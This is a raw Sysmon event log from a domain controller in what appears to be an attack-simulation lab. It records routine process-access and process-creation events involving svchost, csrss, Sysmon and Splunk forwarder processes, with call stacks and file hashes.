13:15:15.757{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004661Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.757{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004660Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.757{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004659Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.757{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004658Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.757{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004657Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.757{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004656Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.757{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004655Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.757{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004654Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.757{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004653Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.757{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-43E3-6000-0501-000000009A01}2200C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004652Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.757{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-43E3-6000-0501-000000009A01}2200C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004651Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.757{08A6967A-43E3-6000-0501-000000009A01}2200C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004650Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.085{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-43E3-6000-0401-000000009A01}3068C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004649Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.085{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004648Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.085{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004647Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.085{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004646Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.085{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004645Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.085{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004644Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.085{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004643Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.085{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004642Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.085{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004641Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.085{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004640Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.085{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-43E3-6000-0401-000000009A01}3068C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004639Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.085{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-43E3-6000-0401-000000009A01}3068C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004638Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.085{08A6967A-43E3-6000-0401-000000009A01}3068C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004696Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.523{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004695Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 